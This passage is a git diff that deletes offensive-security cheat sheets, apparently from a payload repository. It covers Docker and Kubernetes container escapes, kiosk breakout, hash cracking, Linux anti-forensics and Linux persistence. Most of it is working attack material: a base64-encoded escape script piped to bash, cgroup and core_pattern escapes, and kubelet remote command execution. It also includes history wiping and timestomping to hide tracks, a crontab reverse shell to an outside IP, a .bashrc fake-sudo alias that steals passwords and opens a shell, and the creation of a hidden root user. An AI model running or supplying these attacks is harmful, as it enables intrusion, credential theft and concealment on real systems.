"cm5kX2Rpcj0kKGRhdGUgKyVzIHwgbWQ1c3VtIHwgaGVhZCAtYyAxMCkKbWtkaXIgL3RtcC9jZ3JwICYmIG1vdW50IC10IGNncm91cCAtbyByZG1hIGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgL3RtcC9jZ3JwLyR7cm5kX2Rpcn0KZWNobyAxID4gL3RtcC9jZ3JwLyR7cm5kX2Rpcn0vbm90aWZ5X29uX3JlbGVhc2UKaG9zdF9wYXRoPWBzZWQgLW4gJ3MvLipccGVyZGlyPVwoW14sXSpcKS4qL1wxL3AnIC9ldGMvbXRhYmAKZWNobyAiJGhvc3RfcGF0aC9jbWQiID4gL3RtcC9jZ3JwL3JlbGVhc2VfYWdlbnQKY2F0ID4gL2NtZCA8PCBfRU5ECiMhL2Jpbi9zaApjYXQgPiAvcnVubWUuc2ggPDwgRU9GCnNsZWVwIDMwIApFT0YKc2ggL3J1bm1lLnNoICYKc2xlZXAgNQppZmNvbmZpZyBldGgwID4gIiR7aG9zdF9wYXRofS9vdXRwdXQiCmhvc3RuYW1lID4+ICIke2hvc3RfcGF0aH0vb3V0cHV0IgppZCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKcHMgYXh1IHwgZ3JlcCBydW5tZS5zaCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKX0VORAoKIyMgTm93IHdlIHRyaWNrIHRoZSBkb2NrZXIgZGFlbW9uIHRvIGV4ZWN1dGUgdGhlIHNjcmlwdC4KY2htb2QgYSt4IC9jbWQKc2ggLWMgImVjaG8gXCRcJCA+IC90bXAvY2dycC8ke3JuZF9kaXJ9L2Nncm91cC5wcm9jcyIKIyMgV2FpaWlpaXQgZm9yIGl0Li4uCnNsZWVwIDYKY2F0IC9vdXRwdXQKZWNobyAi4oCiPygowq/CsMK3Ll8u4oCiIHByb2ZpdCEg4oCiLl8uwrfCsMKvKSnYn+KAoiIK" | base64 -d | bash -' -``` - -Exploit breakdown : - -```powershell -# On the host -docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash - -# In the container -mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x - -echo 1 > /tmp/cgrp/x/notify_on_release -host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` -echo "$host_path/cmd" > /tmp/cgrp/release_agent - -echo '#!/bin/sh' > /cmd -echo "ps aux > $host_path/output" >> /cmd -chmod a+x /cmd - -sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" -``` - -### Abusing coredumps and core_pattern - -1. Find the mounting point using `mount` - ```ps1 - $ mount | head -n 1 - overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/YLH6C6EQMMG7DA2AL5DUANDHYJ:/var/lib/docker/overlay2/l/HP7XLDFT4ERSCYVHJ2WMZBG2YT,upperdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff,workdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/work) - ``` -2. Create an evil binary at the root of the filesystem: `cp /tmp/poc /poc` -3. Set the program to be executed on the coredumps - ```ps1 - echo "|/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff/poc" > /proc/sys/kernel/core_pattern - ``` -4. Generate a coredump with a faulty program: `gcc -o crash crash.c && ./crash` - ```cpp - int main(void) { - char buf[1]; - for (int i = 0; i < 100; i++) { - buf[i] = 1; - } - return 0; - } - ``` -5. Your payload should have been executed on the host - - -## Breaking out of Docker via runC - -> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. - Vulnerability overview by the runC team - -Exploit for CVE-2019-5736 : https://github.com/twistlock/RunC-CVE-2019-5736 - -```powershell -$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC -$ docker run --rm cve-2019-5736:malicious_image_POC -``` - -## Breaking out of containers using a device file - -```powershell -https://github.com/FSecureLABS/fdpasser -In container, as root: ./fdpasser recv /moo /etc/shadow -Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo -Outside container: ls -la /etc/shadow -Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow -``` - - -## Breaking out of Docker via kernel modules loading - -> When privileged Linux containers attempt to load kernel modules, the modules are loaded into the host's kernel (because there is only *one* kernel, unlike VMs). This provides a route to an easy container escape. - -Exploitation: -* Clone the repository : `git clone https://github.com/xcellerator/linux_kernel_hacking/tree/master/3_RootkitTechniques/3.8_privileged_container_escaping` -* Build with `make` -* Start a privileged docker container with `docker run -it --privileged --hostname docker --mount "type=bind,src=$PWD,dst=/root" ubuntu` -* `cd /root` in the new container -* Insert the kernel module with `./escape` -* Run `./execute`! - -Unlike other techniques, this module doesn't contain any syscalls hooks, but merely creates two new proc files; `/proc/escape` and `/proc/output`. - -* `/proc/escape` only answers to write requests and simply executes anything that's passed to it via [`call_usermodehelper()`](https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper.html). -* `/proc/output` just takes input and stores it in a buffer when written to, then returns that buffer when it's read from - essentially acting a like a file that both the container and the host can read/write to. - -The clever part is that anything we write to `/proc/escape` gets sandwiched into `/bin/sh -c > /proc/output`. This means that the command is run under `/bin/sh` and the output is redirected to `/proc/output`, which we can then read from within the container. - -Once the module is loaded, you can simply `echo "cat /etc/passwd" > /proc/escape` and then get the result via `cat /proc/output`. Alternatively, you can use the `execute` program to give yourself a makeshift shell (albeit an extraordinarily basic one). - -The only caveat is that we cannot be sure that the container has `kmod` installed (which provides `insmod` and `rmmod`). To overcome this, after building the kernel module, we load it's byte array into a C program, which then uses the `init_module()` syscall to load the module into the kernel without needing `insmod`. If you're interested, take a look at the Makefile. - - -## References - -- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/) -- [Understanding Docker container escapes - JULY 19, 2019 - Trail of Bits](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) -- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) -- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) -- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) -- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md) -- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/) -- [Linux Kernel Hacking 3.8: Privileged Container Escapes - Harvey Phillips @xcellerator](https://github.com/xcellerator/linux_kernel_hacking/tree/master/3_RootkitTechniques/3.8_privileged_container_escaping) -* [Escaping privileged containers for fun - 2022-03-06 :: Jordy Zomer](https://pwning.systems/posts/escaping-containers-for-fun/) \ No newline at end of file diff --git a/Methodology and Resources/Container - Kubernetes Pentest.md b/Methodology and Resources/Container - Kubernetes Pentest.md deleted file mode 100644 index c59775f..0000000 --- a/Methodology and Resources/Container - Kubernetes Pentest.md +++ /dev/null @@ -1,46 +0,0 @@ -# Container - Kubernetes Pentest - -> Kubernetes commonly stylized as K8s) is an open-source container orchestration system for automating software deployment, scaling, and management. - -## Summary - -- [Tools](#tools) -- [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp) -- [Obtaining Service Account Token](#obtaining-service-account-token) -- [References](#references) - -## Tools - -* [BishopFox/badpods](https://github.com/BishopFox/badpods) - A collection of manifests that will create pods with elevated privileges. - ```ps1 - kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml - kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml - kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml - kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml - kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml - kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml - kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml - kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml - ``` -* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce) - -## Accessible kubelet on 10250/TCP - -Requirements: -* `--anonymous-auth`: Enables anonymous requests to the Kubelet server - -* Getting pods: `curl -ks https://worker:10250/pods` -* Run commands: `curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'` - -## Obtaining Service Account Token - -Token is stored at `/var/run/secrets/kubernetes.io/serviceaccount/token` - -Use the service account token: -* on kube-apiserver API: `curl -ks -H "Authorization: Bearer " https://master:6443/api/v1/namespaces/{namespace}/secrets` -* with kubectl: ` kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="" get secrets --all-namespaces -o json` - - -## References - -* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet) \ No newline at end of file diff --git a/Methodology and Resources/Escape Breakout.md b/Methodology and Resources/Escape Breakout.md deleted file mode 100644 index 8fb8528..0000000 --- a/Methodology and Resources/Escape Breakout.md +++ /dev/null @@ -1,152 +0,0 @@ -# Application Escape and Breakout - -## Summary - -* [Gaining a command shell](#gaining-a-command-shell) -* [Sticky Keys](#sticky-keys) -* [Dialog Boxes](#dialog-boxes) - * [Creating new files](#creating-new-files) - * [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance) - * [Exploring Context Menus](#exploring-context-menus) - * [Save as](#save-as) - * [Input Boxes](#input-boxes) - * [Bypass file restrictions](#bypass-file-restrictions) -* [Internet Explorer](#internet-explorer) -* [Shell URI Handlers](#shell-uri-handlers) -* [References](#references) - -## Gaining a command shell - -* **Shortcut** - * [Window] + [R] -> cmd - * [CTRL] + [SHIFT] + [ESC] -> Task Manager - * [CTRL] + [ALT] + [DELETE] -> Task Manager -* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it -* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe -* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe` -* **Task Manager**: `File` > `New Task (Run...)` > `cmd` -* **MSPAINT.exe** - * Open MSPaint.exe and set the canvas size to: `Width=6` and `Height=1` pixels - * Zoom in to make the following tasks easier - * Using the colour picker, set pixels values to (from left to right): - ```ps1 - 1st: R: 10, G: 0, B: 0 - 2nd: R: 13, G: 10, B: 13 - 3rd: R: 100, G: 109, B: 99 - 4th: R: 120, G: 101, B: 46 - 5th: R: 0, G: 0, B: 101 - 6th: R: 0, G: 0, B: 0 - ``` - * Save it as 24-bit Bitmap (*.bmp;*.dib) - * Change its extension from bmp to bat and run - - -## Sticky Keys - -* Spawn the sticky keys dialog - * Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` - * Hit 5 times [SHIFT] -* Visit "Ease of Access Center" -* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center" -* Start the OSK (On-Screen-Keyboard) -* You can now use the keyboard shortcut (CTRL+N) - -## Dialog Boxes - -### Creating new files - -* Batch files – Right click > New > Text File > rename to .BAT (or .CMD) > edit > open -* Shortcuts – Right click > New > Shortcut > `%WINDIR%\system32` - -## Open a new Windows Explorer instance - -* Right click any folder > select `Open in new window` - -## Exploring Context Menus - -* Right click any file/folder and explore context menus -* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location` - -### Save as - -* "Save as" / "Open as" option -* "Print" feature – selecting "print to file" option (XPS/PDF/etc) -* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe` - -### Input Boxes - -Many input boxes accept file paths; try all inputs with UNC paths such as `//attacker–pc/` or `//127.0.0.1/c$` or `C:\` - - -### Bypass file restrictions - -Enter *.* or *.exe or similar in `File name` box - -## Internet Explorer - -### Download and Run/Open - -* Text files -> opened by Notepad - -### Menus - -* The address bar -* Search menus -* Help menus -* Print menus -* All other menus that provide dialog boxes - -### Accessing filesystem - -Enter these paths in the address bar: - -* file://C:/windows -* C:/windows/ -* %HOMEDRIVE% -* \\127.0.0.1\c$\Windows\System32 - -### Unassociated Protocols - -It is possible to escape a browser based kiosk with other protocols than usual `http` or `https`. -If you have access to the address bar, you can use any known protocol (`irc`, `ftp`, `telnet`, `mailto`, etc.) -to trigger the *open with* prompt and select a program installed on the host. -The program will than be launched with the uri as a parameter, you need to select a program that will not crash when recieving it. -It is possible to send multiple parameters to the program by adding spaces in your uri. - -Note: This technique required that the protocol used is not already associated with a program. - -Example - Launching Firefox with a custom profile: - -This is a nice trick since Firefox launched with the custom profile may not be as much hardened as the default profile. - -0. Firefox need to be installed. -1. Enter the following uri in the address bar: `irc://127.0.0.1 -P "Test"` -2. Press enter to navigate to the uri. -3. Select the firefox program. -4. Firefox will be launched with the profile `Test`. - -In this example, it's the equivalent of running the following command: -``` -firefox irc://127.0.0.1 -P "Test" -``` - - -## Shell URI Handlers - -* shell:DocumentsLibrary -* shell:Librariesshell:UserProfiles -* shell:Personal -* shell:SearchHomeFolder -* shell:System shell:NetworkPlacesFolder -* shell:SendTo -* shell:Common Administrative Tools -* shell:MyComputerFolder -* shell:InternetFolder - -## References - -* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/) -* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/) -* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications) -* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/) -* [HOW TO LAUNCH COMMAND PROMPT AND POWERSHELL FROM MS PAINT - 2022-05-14 - Rickard](https://tzusec.com/how-to-launch-command-prompt-and-powershell-from-ms-paint/) \ No newline at end of file diff --git a/Methodology and Resources/Hash Cracking.md b/Methodology and Resources/Hash Cracking.md deleted file mode 100644 index b3ea6f4..0000000 --- a/Methodology and Resources/Hash Cracking.md +++ /dev/null @@ -1,169 +0,0 @@ -# Hash Cracking - -## Summary - -* [Hashcat](https://hashcat.net/hashcat/) - * [Hashcat Example Hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) - * [Hashcat Install](#hashcat-install) - * [Mask attack](#mask-attack) - * [Dictionary](#dictionary) -* [John](https://github.com/openwall/john) - * [Usage](#john-usage) -* [Rainbow tables](#rainbow-tables) -* [Tips and Tricks](#tips-and-tricks) -* [Online Cracking Resources](#online-cracking-resources) -* [References](#references) - - -## Hashcat - -### Hashcat Install - -```powershell -apt install cmake build-essential -y -apt install checkinstall git -y -git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install -``` - -1. Extract the hash -2. Get the hash format: https://hashcat.net/wiki/doku.php?id=example_hashes -3. Establish a cracking stratgy based on hash format (ex: wordlist -> wordlist + rules -> mask -> combinator mode -> prince attack -> ...) -4. Enjoy plains -5. Review strategy -6. Start over - -### Dictionary - -> Every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash. - -```powershell -hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file -r $my_rules -``` - -* Wordlists - * [packetstorm](https://packetstormsecurity.com/Crackers/wordlists/) - * [weakpass_3a](https://download.weakpass.com/wordlists/1948/weakpass_3a.7z) - * [weakpass_3](https://download.weakpass.com/wordlists/1947/weakpass_3.7z) - * [Hashes.org](https://download.weakpass.com/wordlists/1931/Hashes.org.7z) - * [kerberoast_pws](https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz) - * [hashmob.net](https://hashmob.net/research/wordlists) - * [clem9669/wordlists](https://github.com/clem9669/wordlists) - -* Rules - * [One Rule to Rule Them All](https://notsosecure.com/one-rule-to-rule-them-all/) - * [nsa-rules](https://github.com/NSAKEY/nsa-rules) - * [hob064](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule) - * [d3adhob0](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule) - * [clem9669/hashcat-rule](https://github.com/clem9669/hashcat-rule) - -### Mask attack - -Mask attack is an attack mode which optimize brute-force. - -> Every possibility for a given character set and a given length (i.e. aaa, aab, aac, ...) is hashed and compared against the target hash. - -```powershell -# Mask: upper*1+lower*5+digit*2 and upper*1+lower*6+digit*2 -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?d?d -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?l?d?d -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?l?d?d?1 -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?l?l?d?d?1 - -# Mask: upper*1+lower*3+digit*4 and upper*1+lower*3+digit*4 -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?d?d?d?d -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?d?d?d?d -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?d?d?d?d -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?d?d?d?d?1 -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?u?l?l?l?l?d?d?d?d?1 - -# Mask: lower*6 + digit*2 + special digit(+!?*) -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?l?l?l?l?l?l?d?d?1 -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 "*+!??" ?l?l?l?l?l?l?d?d?1?1 - -# Mask: lower*6 + digit*2 -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 /content/hashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1 - -# Other examples -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a -hashcat -m 1000 --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?u?l?l?l?l?l?l?d?d?d?d -hashcat --attack-mode 3 --increment --increment-min 4 --increment-max 8 --hash-type $number $hashes_file "?a?a?a?a?a?a?a?a?a?a?a?a" -hashcat --attack-mode 3 --hash-type $number $hashes_file "?u?l?l?l?d?d?d?d?s" -hashcat --attack-mode 3 --hash-type $number $hashes_file "?a?a?a?a?a?a?a?a" -hashcat --attack-mode 3 --custom-charset1 "?u" --custom-charset2 "?l?u?d" --custom-charset3 "?d" --hash-type $number $hashes_file "?1?2?2?2?3" -``` - -| Shortcut | Characters | -|----|----------------------------| -| ?l | abcdefghijklmnopqrstuvwxyz | -| ?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ | -| ?d | 0123456789 | -| ?s | !"#$%&'()*+,-./:;<=>?@[\]^_`{}~ | -| ?a | ?l?u?d?s | -| ?b | 0x00 - 0xff | - - - -## John - - -### John Usage - -```bash -# Run on password file containing hashes to be cracked -john passwd - -# Use a specific wordlist -john --wordlist= passwd - -# Use a specific wordlist with rules -john --wordlist= passwd --rules=Jumbo - -# Show cracked passwords -john --show passwd - -# Restore interrupted sessions -john --restore -``` - - -## Rainbow tables - -> The hash is looked for in a pre-computed table. It is a time-memory trade-off that allows cracking hashes faster, but costing a greater amount of memory than traditional brute-force of dictionary attacks. This attack cannot work if the hashed value is salted (i.e. hashed with an additional random value as prefix/suffix, making the pre-computed table irrelevant) - -## Tips and Tricks - -* Cloud GPU - * [penglab - Abuse of Google Colab for cracking hashes. 🐧](https://github.com/mxrch/penglab) - * [google-colab-hashcat - Google colab hash cracking](https://github.com/ShutdownRepo/google-colab-hashcat) - * [Cloudtopolis - Zero Infrastructure Password Cracking](https://github.com/JoelGMSec/Cloudtopolis) - * [Nephelees - also a NTDS cracking tool abusing Google Colab](https://github.com/swisskyrepo/Nephelees) -* Build a rig on premise - * [Pentester's Portable Cracking Rig - $1000](https://www.netmux.com/blog/portable-cracking-rig) - * [How To Build A Password Cracking Rig - 5000$](https://www.netmux.com/blog/how-to-build-a-password-cracking-rig) -* Online cracking - * [Hashes.com](https://hashes.com/en/decrypt/hash) - * [hashmob.net](https://hashmob.net/): great community with Discord -* Use the `loopback` in combination with rules and dictionary to keep cracking until you don't find new passsword: `hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file` -* PACK (Password Analysis and Cracking Kit) - * https://github.com/iphelix/pack/blob/master/README - * Can produce custom hcmask files to use with hashcat, based on statistics and rules applied on an input dataset -* Use Deep Learning - * [brannondorsey/PassGAN](https://github.com/brannondorsey/PassGAN) - - -## Online Cracking Resources - -* [hashes.com](https://hashes.com) -* [crackstation](https://crackstation.net) -* [Hashmob](https://hashmob.net/) - - -## References - -* [Cracking - The Hacker Recipes](https://www.thehacker.recipes/ad-ds/movement/credentials/cracking) -* [Using Hashcat to Crack Hashes on Azure](https://durdle.com/2017/04/23/using-hashcat-to-crack-hashes-on-azure/) -* [miloserdov.org hashcat](https://miloserdov.org/?p=5426&PageSpeed=noscript) -* [miloserdov.org john](https://miloserdov.org/?p=4961&PageSpeed=noscript) -* [DeepPass — Finding Passwords With Deep Learning - Will Schroeder - Jun 1](https://posts.specterops.io/deeppass-finding-passwords-with-deep-learning-4d31c534cd00) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Evasion.md b/Methodology and Resources/Linux - Evasion.md deleted file mode 100644 index 8ed2089..0000000 --- a/Methodology and Resources/Linux - Evasion.md +++ /dev/null @@ -1,120 +0,0 @@ -# Linux - Evasion - -## Summary - -- [File names](#file-names) -- [Command history](#command-history) -- [Hiding text](#hiding-text) -- [Timestomping](#timestomping) - - -## File Names - -An Unicode zero-width space can be inserted into filenames which makes the names visually indistinguishable: - -```bash -# A decoy file with no special characters -touch 'index.php' - -# An imposter file with visually identical name -touch $'index\u200D.php' -``` - - -## Command History - -Most shells save their command history so a user can recall them again later. The command history can be viewed with the `history` command or by manually inspecting the contents of the file pointed to by `$HISTFILE` (e.g. `~/.bash_history`). -This can be prevented in a number of ways. - -```bash -# Prevent writing to the history file at all -unset HISTFILE - -# Don't save this session's command history in memory -export HISTSIZE=0 -``` - -Individual commands that match a pattern in `HISTIGNORE` will be excluded from the command history, regardless of `HISTFILE` or `HISTSIZE` settings. -By default, `HISTIGNORE` will ignore all commands that begin with whitespace: - -```bash -# Note the leading space character: - my-sneaky-command -``` - -If commands are accidentally added to the command history, individual command entries can be removed with `history -d`: - -```bash -# Removes the most recently logged command. -# Note that we actually have to delete two history entries at once, -# otherwise the `history -d` command itself will be logged as well. -history -d -2 && history -d -1 -``` - -The entire command history can be purged as well, although this approach is much less subtle and very likely to be noticed: - -```bash -# Clears the in-memory history and writes the empty history to disk. -history -c && history -w -``` - - -## Hiding Text - -ANSI escape sequences can be abused to hide text under certain circumstances. -If the file's contents are printed to the terminal (e.g. `cat`, `head`, `tail`) then the text will be hidden. -If the file is viewed with an editor (e.g. `vim`, `nano`, `emacs`), then the escape sequences will be visible. - -```bash -echo "sneaky-payload-command" > script.sh -echo "# $(clear)" >> script.sh -echo "# Do not remove. Generated from /etc/issue.conf by configure." >> script.sh - -# When printed, the terminal will be cleared and only the last line will be visible: -cat script.sh -``` - - -## Timestomping - -Timestomping refers to the alteration of a file or directory's modification/access timestamps in order to conceal the fact that it was modified. -The simplest way to accomplish this is with the `touch` command: - -```bash -# Changes the access (-a) and modification (-m) times using YYYYMMDDhhmm format. -touch -a -m -t 202210312359 "example" - -# Changes time using a Unix epoch timestamp. -touch -a -m -d @1667275140 "example" - -# Copies timestamp from one file to another. -touch -a -m -r "other_file" "example" - -# Get the file's modification timestamp, modify the file, then restore the timestamp. -MODIFIED_TS=$(stat --format="%Y" "example") -echo "backdoor" >> "example" -touch -a -m -d @$MODIFIED_TS "example" -``` - -It should be noted that `touch` can only modify the access and modification timestamps. It can't be used to update a file's "change" or "birth" timestamps. The birth timestamp, if supported by the filesystem, tracks when the file was created. The change timestamp tracks whenever the file's metadata changes, including updates to the access and modification timestamps. - -If an attacker has root privileges, they can work around this limitation by modifying the system clock, creating or modifying a file, then reverting the system clock: - -```bash -ORIG_TIME=$(date) -date -s "2022-10-31 23:59:59" -touch -a -m "example" -date -s "${ORIG_TIME}" -``` - -Don't forget that creating a file also updates the parent directory's modification timestamp as well! - - -## References - -- [ATT&CK - Impair Defenses: Impair Command History Logging](https://attack.mitre.org/techniques/T1562/003/) -- [ATT&CK - Indicator Removal: Timestomp](https://attack.mitre.org/techniques/T1070/006/) -- [ATT&CK - Indicator Removal on Host: Clear Command History](https://attack.mitre.org/techniques/T1070/003/) -- [ATT&CK - Masquerading: Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005/) -- [Wikipedia - ANSI escape codes](https://en.wikipedia.org/wiki/ANSI_escape_code) -- [InverseCos - Detecting Linux Anti-Forensics: Timestomping](https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html) diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md deleted file mode 100644 index 43f395d..0000000 --- a/Methodology and Resources/Linux - Persistence.md +++ /dev/null @@ -1,237 +0,0 @@ -# Linux - Persistence - -## Summary - -* [Basic reverse shell](#basic-reverse-shell) -* [Add a root user](#add-a-root-user) -* [Suid Binary](#suid-binary) -* [Crontab - Reverse shell](#crontab---reverse-shell) -* [Backdooring a user's bash_rc](#backdooring-a-users-bash_rc) -* [Backdooring a startup service](#backdooring-a-startup-service) -* [Backdooring a user startup file](#backdooring-a-user-startup-file) -* [Backdooring Message of the Day](#backdooring-message-of-the-day) -* [Backdooring a driver](#backdooring-a-driver) -* [Backdooring the APT](#backdooring-the-apt) -* [Backdooring the SSH](#backdooring-the-ssh) -* [Backdooring Git](#backdooring-git) -* [Additional Linux Persistence Options](#additional-persistence-options) -* [References](#references) - - -## Basic reverse shell - -```bash -ncat --udp -lvp 4242 -ncat --sctp -lvp 4242 -ncat --tcp -lvp 4242 -``` - -## Add a root user - -```powershell -sudo useradd -ou 0 -g 0 john -sudo passwd john -echo "linuxpassword" | passwd --stdin john -``` - -## Suid Binary - -```powershell -TMPDIR2="/var/tmp" -echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c -gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null -rm $TMPDIR2/croissant.c -chown root:root $TMPDIR2/croissant -chmod 4777 $TMPDIR2/croissant -``` - -## Crontab - Reverse shell - -```bash -(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null -``` - -## Backdooring a user's bash_rc - -(FR/EN Version) - -```bash -TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0" -cat << EOF > /tmp/$TMPNAME2 - alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S ' -EOF -if [ -f ~/.bashrc ]; then - cat /tmp/$TMPNAME2 >> ~/.bashrc -fi -if [ -f ~/.zshrc ]; then - cat /tmp/$TMPNAME2 >> ~/.zshrc -fi -rm /tmp/$TMPNAME2 -``` - -or add the following line inside its .bashrc file. - -```powershell -$ chmod u+x ~/.hidden/fakesudo -$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc -``` - -and create the `fakesudo` script. - -```powershell -read -sp "[sudo] password for $USER: " sudopass -echo "" -sleep 2 -echo "Sorry, try again." -echo $sudopass >> 